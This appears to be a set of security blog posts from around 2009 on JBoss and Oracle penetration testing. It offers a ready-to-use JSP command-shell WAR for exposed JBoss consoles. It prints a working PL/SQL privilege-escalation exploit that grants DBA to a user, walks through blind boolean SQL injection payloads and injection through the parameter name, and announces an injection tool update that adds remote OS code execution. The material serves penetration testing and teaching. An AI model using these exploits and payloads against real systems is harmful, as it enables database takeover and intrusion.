www.notsosecure.com

Often while doing Internal Infrastructure assessments, its common to find unrestricted access to JBOSS JMX console. This web interface allows deployment of arbitrary war files. Here is an excellent article describing the process:
http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf

Here is a war file, ready to use: cmd.war (zipped)
Once deployed check for this file on the vulnerable jboss: http://victim:8080/cmd/cmd.jsp

Happy Hacking
————————–
Advert: Testking offers complete collection of latest practice questions for 000-201 as well as 000-330 and 000-331 exams.

I will be conducting 2 one day Oracle Security Trainings in november and december.

November 19th 2009:
Venue: New Delhi, India
Course Agenda/Outline: http://securitybyte.org/index.php/trainings/sessions/1-day-tracks/62-hacking-and-securing-oracle-database-.html

At Owasp India, I will also be giving a talk. The talk is titled, ‘Hacking Oracle From Web’. Here I will discuss some advanced techniques for exploiting SQL/PLSQL Injections targeting Oracle back-end along with the security problems with other Oracle components such as Oracle Application Servers, Application Portal, Secure Back-up etc.

December 14th 2009
Venue: 7Safe, Sawston, Cambridge, U.K
Course Agenda/Outline:
http://7safe.com/oracle_database_security_training_course.htm

The exploit for this vulnerability is in metasploit, but i could not find it on milw0rm or at any other exploit repository. This was patched in CPU July 2008

So, if you need to use it outside metasploit, here it is:

DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,’declare pragma autonomous_transaction; begin execute immediate ”grant dba to scott”;commit;end;’,0);
DBMS_DEFER_SYS.DELETE_TRAN(’aaaaaa’,'a” and dbms_sql.execute(’||D||’)=1–’);
end;

text file

I have received a few emails from people asking me to explain what i mean by this and when could this be useful. Firstly, this is nothing new and probably everyone understands it under ‘Difficult boolean logic’ sql injection category. Anyways, here’s a better explanation and a more realistic example:

Imagine a php script taking user’s input in construction of 2 sql queries:

$sql_1=”select foo from bar where uid =5 and id =’ “. $_GET['id']. ” ‘ “;
$sql_2=”select foo2 from bar2 where id in (’ “. $_GET['id']. ” )’ “;

So, the same input goes into 2 different sql query. One in parenthesis() and one without parenthesis. Next, consider that the application logic is such that it only checks if sql query returned any rows or not. So, when the sql query is true (no errors) and irrespective of how many rows returned the application returns some page and returns a different error page when there is a SQL error. In this example, it is difficult to use the comments(–) to ignore part of the query, as the input goes in parenthesis in one instance only. Hence, i think the use of union is not possible.

Now, you could you use the case statement to throw errors(’sql error: subquery returned more than one row’), whenever the SQL query is false, thus making a boolean logic blind SQL Injection.

e.g:
select foo from bar where uid =5 and id = ‘ injection’ and (case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end) and ‘1′=’1 ‘;

select foo2 from bar2 where id in (’ injection’ and (case when (1=1) than 1 else 1*(select table_name from information_schema.tables)end) and ‘1′=’1 ‘)

In the above example, only the first query will return the sql error when there is a flase condition (e.g. 1=2), while the second query is just syntactically correct. So, now you could replace the (1=1) and (1=2) with you boolean logic SQL string and extract data.
————–
Further, in one of the slides at OWAPS AU i mentioned about the areas which generally get missed by automated SQL Injection scanners. The above example, is one such scenario which automated tools will generally miss. Recently, i have seen a few applications, where the form parameters name is used in sql query.
so imagine a URL like:

http://vuln.com/vuln.php?product_id[234]=books

Now, its a common practice to fuzz the parameter value (books) and not so many tools will fuzz the parameter name. Recently, i have seen a few SQL injections in parameter name:

http://vuln.com/vuln.php?product_id[234' or '1'='1]=books

Hope this helps…

This is an updated version of bsqlbf. This now has the VALIDATE_REMOTE_RC() exploit which David Litchfield discussed in his paper

6: Type 6 is O.S code execution [ORACLE DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit]

This vulnerability was patched by Oracle in July 2009 Critical Patch Update. In a nutshell, if you have identified a SQL injection as ‘SYS’ user than this version of bsqlbf will let you execute OS code on remote Oracle database host.

I will be giving a demo of this at Sec-T on 11th September.
Download it Here